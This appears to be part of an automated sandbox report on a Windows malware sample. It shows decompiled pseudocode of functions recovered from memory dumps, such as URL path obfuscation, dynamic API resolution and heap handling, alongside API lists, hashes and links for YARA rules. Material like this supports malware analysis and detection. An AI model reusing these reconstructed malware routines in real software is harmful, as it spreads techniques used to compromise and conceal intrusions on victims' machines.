                                                                                                            • String ID:
                                                                                                            • API String ID: 2520070614-0
                                                                                                            • Opcode ID: b3009ac81ca725c6cab0f473ad8ec12e5ea4852f7e29343459120d45f6100cd4
                                                                                                            • Instruction ID: 0fe950cc1a9682c1630a68a0c49881135a487e06b5c87e33bdca215bcca96361
                                                                                                            • Opcode Fuzzy Hash: b3009ac81ca725c6cab0f473ad8ec12e5ea4852f7e29343459120d45f6100cd4
                                                                                                            • Instruction Fuzzy Hash: 2921F8B1D0424CEBCB04DFE4C950BDEBBB9BF48318F108169E529AB294DB356A05CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 030326DD, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E030326DD(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x303d270, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x303d288; // 0x69ef8f4c
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x303d288 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                                                                            0x030326e5
                                                                                                            0x030326e8
                                                                                                            0x030326ee
                                                                                                            0x03032706
                                                                                                            0x03032708
                                                                                                            0x0303270d
                                                                                                            0x0303270f
                                                                                                            0x03032712
                                                                                                            0x03032714
                                                                                                            0x03032717
                                                                                                            0x03032719
                                                                                                            0x03032719
                                                                                                            0x0303271b
                                                                                                            0x03032726
                                                                                                            0x0303272b
                                                                                                            0x0303273c
                                                                                                            0x03032744
                                                                                                            0x03032749
                                                                                                            0x0303274c
                                                                                                            0x0303274f
                                                                                                            0x03032751
                                                                                                            0x03032754
                                                                                                            0x03032757
                                                                                                            0x03032757
                                                                                                            0x0303275a
                                                                                                            0x03032765
                                                                                                            0x0303276a
                                                                                                            0x03032774

                                                                                                            APIs
                                                                                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03031A07,00000000,?,?,03034653,?,053195B0), ref: 030326E8
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 03032700
                                                                                                            • memcpy.NTDLL(00000000,?,-00000008,?,?,?,03031A07,00000000,?,?,03034653,?,053195B0), ref: 03032744
                                                                                                            • memcpy.NTDLL(00000001,?,00000001), ref: 03032765
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$AllocateHeaplstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1819133394-0
                                                                                                            • Opcode ID: 1cd24c51c9008e8b4a4e4b628b04c13eb7cc45233634a8ecf7c5f0220583ce7e
                                                                                                            • Instruction ID: 7ad19985a6cc6850a07224fc2155809f8ec64e15a3ce6451c00bcbd068a8bedd
                                                                                                            • Opcode Fuzzy Hash: 1cd24c51c9008e8b4a4e4b628b04c13eb7cc45233634a8ecf7c5f0220583ce7e
                                                                                                            • Instruction Fuzzy Hash: E0112576A02214BFD714DA69DC88E9EBBFEEBD5260B090276F504D7240E6749E0497A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03035AB2, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E03035AB2(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E03031A9C(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x303d2e0; // 0x22da5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x303e4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x303e8f0; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E030334C7();
					_push( &_v64);
					if( *0x303d0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E030334C7();
				}
				return _t28;
			}














                                                                                                            0x03035ab2
                                                                                                            0x03035ab9
                                                                                                            0x03035ac7
                                                                                                            0x03035acb
                                                                                                            0x03035ad5
                                                                                                            0x03035ada
                                                                                                            0x03035adf
                                                                                                            0x03035ae4
                                                                                                            0x03035aee
                                                                                                            0x03035af8
                                                                                                            0x03035af8
                                                                                                            0x03035af0
                                                                                                            0x03035af0
                                                                                                            0x03035af0
                                                                                                            0x03035af0
                                                                                                            0x03035afe
                                                                                                            0x03035b04
                                                                                                            0x03035b05
                                                                                                            0x03035b08
                                                                                                            0x03035b0b
                                                                                                            0x03035b0e
                                                                                                            0x03035b16
                                                                                                            0x03035b1f
                                                                                                            0x03035b27
                                                                                                            0x03035b27
                                                                                                            0x03035b29
                                                                                                            0x03035b2b
                                                                                                            0x03035b2b
                                                                                                            0x03035b35

                                                                                                            APIs
                                                                                                              • Part of subcall function 03031A9C: SysAllocString.OLEAUT32(00000000), ref: 03031AF6
                                                                                                              • Part of subcall function 03031A9C: SysAllocString.OLEAUT32(0070006F), ref: 03031B0A
                                                                                                              • Part of subcall function 03031A9C: SysAllocString.OLEAUT32(00000000), ref: 03031B1C
                                                                                                            • memset.NTDLL ref: 03035AD5
                                                                                                            • GetLastError.KERNEL32 ref: 03035B21
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AllocString$ErrorLastmemset
                                                                                                            • String ID: <$@MxtNxt
                                                                                                            • API String ID: 3736384471-3662781078
                                                                                                            • Opcode ID: 6a85c476a99afc87691c2be8eeda54f6bd44b131a87dadb595350623f49c98bd
                                                                                                            • Instruction ID: b069be1ff6ec0c12812c10110fe2f0bc001708e9b27971293d15f577129f1aca
                                                                                                            • Opcode Fuzzy Hash: 6a85c476a99afc87691c2be8eeda54f6bd44b131a87dadb595350623f49c98bd
                                                                                                            • Instruction Fuzzy Hash: B3012975902218ABDB51EFA4DC84EDEBBFCAB4A640F044526F908EB250D774D9018BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F051E2F, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F051E36
                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6F051E43
                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6F051E80
                                                                                                              • Part of subcall function 6F050FAE: _Yarn.LIBCPMT ref: 6F050FCD
                                                                                                              • Part of subcall function 6F050FAE: _Yarn.LIBCPMT ref: 6F050FF1
                                                                                                            • std::exception::exception.LIBCMTD ref: 6F051EA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                            • String ID:
                                                                                                            • API String ID: 2425033533-0
                                                                                                            • Opcode ID: 068de06cd81252e7670178095b09e314b0f514ddc13a0911309fed16d92a2d3a
                                                                                                            • Instruction ID: 16ea2ed692671786158aa57e3f411c0664fcb135a78c689c6fc0a7f567fc5b0b
                                                                                                            • Opcode Fuzzy Hash: 068de06cd81252e7670178095b09e314b0f514ddc13a0911309fed16d92a2d3a
                                                                                                            • Instruction Fuzzy Hash: C8018C71905754DECB309FAA858078BFEE0BF28214B50896FE58E87A41C771A510CBAA
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03034450, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03034450() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x303d2a4; // 0x2ec
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x303d2f4; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x303d2a4; // 0x2ec
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x303d270; // 0x4f20000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                                                                            0x03034450
                                                                                                            0x03034457
                                                                                                            0x030344a1
                                                                                                            0x030344a3
                                                                                                            0x030344a3
                                                                                                            0x0303445b
                                                                                                            0x03034461
                                                                                                            0x03034466
                                                                                                            0x0303446a
                                                                                                            0x03034470
                                                                                                            0x03034477
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x03034479
                                                                                                            0x0303447e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0303447e
                                                                                                            0x03034480
                                                                                                            0x03034488
                                                                                                            0x0303448b
                                                                                                            0x0303448b
                                                                                                            0x03034491
                                                                                                            0x03034498
                                                                                                            0x0303449b
                                                                                                            0x0303449b
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(000002EC,00000001,0303191C), ref: 0303445B
                                                                                                            • SleepEx.KERNEL32(00000064,00000001), ref: 0303446A
                                                                                                            • CloseHandle.KERNEL32(000002EC), ref: 0303448B
                                                                                                            • HeapDestroy.KERNEL32(04F20000), ref: 0303449B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4109453060-0
                                                                                                            • Opcode ID: 2ac6182c1ddcfe8e2bf050b5267e12d2d176b33335ff7d8f3a4c791421be0128
                                                                                                            • Instruction ID: 2c1480b89419610ba80581b1aefad36375d31796a7d1f5f18e989b55b0324ad6
                                                                                                            • Opcode Fuzzy Hash: 2ac6182c1ddcfe8e2bf050b5267e12d2d176b33335ff7d8f3a4c791421be0128
                                                                                                            • Instruction Fuzzy Hash: 51F06572B073129BEF20FB36E98CB4236ECEB15761B090520BC04EB988DF2CC404C660
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F092439, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID: -
                                                                                                            • API String ID: 269201875-2547889144
                                                                                                            • Opcode ID: ff46db10ad3bf996c822c11df43c6b2d41a6a45196c34a87bd487786654de76e
                                                                                                            • Instruction ID: dd04d97c3ded2eb6ea598c02f791702432311bcdef09cb612bdcde9900f5b201
                                                                                                            • Opcode Fuzzy Hash: ff46db10ad3bf996c822c11df43c6b2d41a6a45196c34a87bd487786654de76e
                                                                                                            • Instruction Fuzzy Hash: 65C1D271A042159BDF24DF64CC50BEEB3F9FF15718F5064AAD819AB180FB31AA81EB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0303117A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memorytimeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0303117A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E03031922(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0;
					_t22 = E03039371(__ecx, _a4, _a8, _t25);
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E03034A6D(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x303d270, 0, _t25);
				}
				return _t22;
			}










                                                                                                            0x0303117a
                                                                                                            0x0303118b
                                                                                                            0x0303118f
                                                                                                            0x030311ea
                                                                                                            0x03031191
                                                                                                            0x03031198
                                                                                                            0x030311a0
                                                                                                            0x030311a8
                                                                                                            0x030311ac
                                                                                                            0x030311b2
                                                                                                            0x030311ba
                                                                                                            0x030311bd
                                                                                                            0x030311d5
                                                                                                            0x030311d5
                                                                                                            0x030311e0
                                                                                                            0x030311e0
                                                                                                            0x030311f1

                                                                                                            APIs
                                                                                                              • Part of subcall function 03031922: lstrlen.KERNEL32(?,00000000,05319B38,00000000,030374FF,05319D16,?,?,?,?,?,69B25F44,00000005,0303D00C), ref: 03031929
                                                                                                              • Part of subcall function 03031922: mbstowcs.NTDLL ref: 03031952
                                                                                                              • Part of subcall function 03031922: memset.NTDLL ref: 03031964
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,05319364), ref: 030311B2
                                                                                                            • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,05319364), ref: 030311E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 1500278894-1536154274
                                                                                                            • Opcode ID: 63415c8ae04752870e794a641a1986ee3f2f0735ee4243343889b782660c537b
                                                                                                            • Instruction ID: 83a94ae1175f701d24d6355715f4430187a4e4f9ead9a893f8d293809a3efed8
                                                                                                            • Opcode Fuzzy Hash: 63415c8ae04752870e794a641a1986ee3f2f0735ee4243343889b782660c537b
                                                                                                            • Instruction Fuzzy Hash: FB018436211209BBDB21AFA9DC44EDF7BBCFF8A754F000426FA40AA150D671D914C750
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 030327C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E030327C7(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t9;
				signed int _t11;
				intOrPtr _t12;
				struct HINSTANCE__* _t14;
				intOrPtr _t17;
				intOrPtr _t20;

				_t9 =  *0x303d2d8;
				_v8 = _v8 & 0x00000000;
				_t20 =  *0x303d28c; // 0x2f0
				if(_t9 != 0) {
					L2:
					if(_t20 != 0) {
						_t11 =  *_t9(_t20,  &_v8);
						if(_t11 == 0) {
							_v8 = _v8 & _t11;
						}
					}
					L5:
					return _v8;
				}
				_t12 =  *0x303d2e0; // 0x22da5a8
				_t3 = _t12 + 0x303e0af; // 0x4e52454b
				_t14 = GetModuleHandleA(_t3);
				_t17 =  *0x303d2e0; // 0x22da5a8
				_t4 = _t17 + 0x303e9ea; // 0x6f577349
				 *0x303d2ac = _t14;
				_t9 = GetProcAddress(_t14, _t4);
				 *0x303d2d8 = _t9;
				if(_t9 == 0) {
					goto L5;
				}
				goto L2;
			}










                                                                                                            0x030327cb
                                                                                                            0x030327d0
                                                                                                            0x030327d5
                                                                                                            0x030327dd
                                                                                                            0x03032813
                                                                                                            0x03032815
                                                                                                            0x0303281c
                                                                                                            0x03032820
                                                                                                            0x03032822
                                                                                                            0x03032822
                                                                                                            0x03032820
                                                                                                            0x03032825
                                                                                                            0x0303282a
                                                                                                            0x0303282a
                                                                                                            0x030327df
                                                                                                            0x030327e4
                                                                                                            0x030327eb
                                                                                                            0x030327f1
                                                                                                            0x030327f7
                                                                                                            0x030327ff
                                                                                                            0x03032804
                                                                                                            0x0303280a
                                                                                                            0x03032811
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(4E52454B,00000000,?,?,030326C2,?,00000001,?,?,?,03031900,?), ref: 030327EB
                                                                                                            • GetProcAddress.KERNEL32(00000000,6F577349), ref: 03032804
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: Nxt
                                                                                                            • API String ID: 1646373207-3788892007
                                                                                                            • Opcode ID: 048dd80997d7f288b16878a30f3cfab1058db0eac2a57c138913c4c8dee070e7
                                                                                                            • Instruction ID: 447d7db3cb6ccf1ebbc506f8115f89d03d52c58dc17c51028feb3b90a4404c54
                                                                                                            • Opcode Fuzzy Hash: 048dd80997d7f288b16878a30f3cfab1058db0eac2a57c138913c4c8dee070e7
                                                                                                            • Instruction Fuzzy Hash: 62F06D7190730AEFDB45EBA9D944A9A73ECEB19314B140559E801E3248E778EA01CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03032291, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E03032291(CHAR* _a4) {
				long _t9;
				CHAR* _t10;

				_t10 = 0;
				_t9 = ExpandEnvironmentStringsA(_a4, 0, 0);
				if(_t9 != 0) {
					_t10 = E030375F6(_t9);
					if(_t10 != 0 && ExpandEnvironmentStringsA(_a4, _t10, _t9) == 0) {
						E03034AAB(_t10);
						_t10 = 0;
					}
				}
				return _t10;
			}





                                                                                                            0x0303229a
                                                                                                            0x030322a4
                                                                                                            0x030322a8
                                                                                                            0x030322b0
                                                                                                            0x030322b4
                                                                                                            0x030322c3
                                                                                                            0x030322c8
                                                                                                            0x030322c8
                                                                                                            0x030322b4
                                                                                                            0x030322cf

                                                                                                            APIs
                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,03031083,73797325), ref: 030322A2
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 030322BC
                                                                                                              • Part of subcall function 03034AAB: RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentExpandHeapStrings$AllocateFree
                                                                                                            • String ID: PGxt
                                                                                                            • API String ID: 1564683301-789712160
                                                                                                            • Opcode ID: 390e6e7f06d8c0bd453b513a6c3ef4ef0476654d9aed5c723d298629747e74da
                                                                                                            • Instruction ID: 067e518613861dd285158b2bfd9a339f09f9f7abaf58aeb906587d056784cf3a
                                                                                                            • Opcode Fuzzy Hash: 390e6e7f06d8c0bd453b513a6c3ef4ef0476654d9aed5c723d298629747e74da
                                                                                                            • Instruction Fuzzy Hash: F2E04F32607632764232A9AB8C44E9FDEECEFE79F130A0525F908E6110DA10C801C2F4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 03031EC1, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 58%
                                                                                                            			E03031EC1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E030375F6(_t2);
				if(_t34 != 0) {
					_t30 = E030375F6(_t28);
					if(_t30 == 0) {
						E03034AAB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0303A971(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0303A971(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                                                                            0x03031ec1
                                                                                                            0x03031ecb
                                                                                                            0x03031ecd
                                                                                                            0x03031ed3
                                                                                                            0x03031ed3
                                                                                                            0x03031edc
                                                                                                            0x03031ee0
                                                                                                            0x03031eec
                                                                                                            0x03031ef0
                                                                                                            0x03031f64
                                                                                                            0x03031ef2
                                                                                                            0x03031ef2
                                                                                                            0x03031ef6
                                                                                                            0x03031efb
                                                                                                            0x03031f00
                                                                                                            0x03031f1a
                                                                                                            0x03031f09
                                                                                                            0x03031f09
                                                                                                            0x03031f0d
                                                                                                            0x03031f10
                                                                                                            0x03031f15
                                                                                                            0x03031f15
                                                                                                            0x03031f1f
                                                                                                            0x03031f47
                                                                                                            0x03031f4d
                                                                                                            0x03031f50
                                                                                                            0x03031f21
                                                                                                            0x03031f23
                                                                                                            0x03031f2b
                                                                                                            0x03031f36
                                                                                                            0x03031f3b
                                                                                                            0x03031f3b
                                                                                                            0x03031f57
                                                                                                            0x03031f5e
                                                                                                            0x03031f5f
                                                                                                            0x03031f5f
                                                                                                            0x03031ef0
                                                                                                            0x03031f6f

                                                                                                            APIs
                                                                                                            • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,03035405,00000000,00000000,747C81D0,05319618,?,?,03032A8A,?,05319618), ref: 03031ECD
                                                                                                              • Part of subcall function 030375F6: RtlAllocateHeap.NTDLL(00000000,00000000,03034F70), ref: 03037602
                                                                                                              • Part of subcall function 0303A971: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,03031EFB,00000000,00000001,00000001,?,?,03035405,00000000,00000000,747C81D0,05319618), ref: 0303A97F
                                                                                                              • Part of subcall function 0303A971: StrChrA.SHLWAPI(?,0000003F,?,?,03035405,00000000,00000000,747C81D0,05319618,?,?,03032A8A,?,05319618,0000EA60,?), ref: 0303A989
                                                                                                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03035405,00000000,00000000,747C81D0,05319618,?,?,03032A8A), ref: 03031F2B
                                                                                                            • lstrcpy.KERNEL32(00000000,747C81D0), ref: 03031F3B
                                                                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 03031F47
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3767559652-0
                                                                                                            • Opcode ID: 4650362c418853e7feb567acac1ff0d6f61db1108be2472892187d10b48ac9cb
                                                                                                            • Instruction ID: c49b0b8029cd3822620bac54a5dca5b58f5ea15ee06328496b1a087b2b77c9e3
                                                                                                            • Opcode Fuzzy Hash: 4650362c418853e7feb567acac1ff0d6f61db1108be2472892187d10b48ac9cb
                                                                                                            • Instruction Fuzzy Hash: 7A218E76506295EFCB06EF64C844AAABFEDAF4B680B054054F9049F212D775D90087A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0303131E, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0303131E(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E030375F6(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                                                                            0x03031333
                                                                                                            0x03031337
                                                                                                            0x03031341
                                                                                                            0x03031346
                                                                                                            0x0303134b
                                                                                                            0x0303134d
                                                                                                            0x03031355
                                                                                                            0x0303135a
                                                                                                            0x03031368
                                                                                                            0x0303136d
                                                                                                            0x03031377

                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(004F0053,?,74785520,00000008,05319364,?,030350AD,004F0053,05319364,?,?,?,?,?,?,030354EF), ref: 0303132E
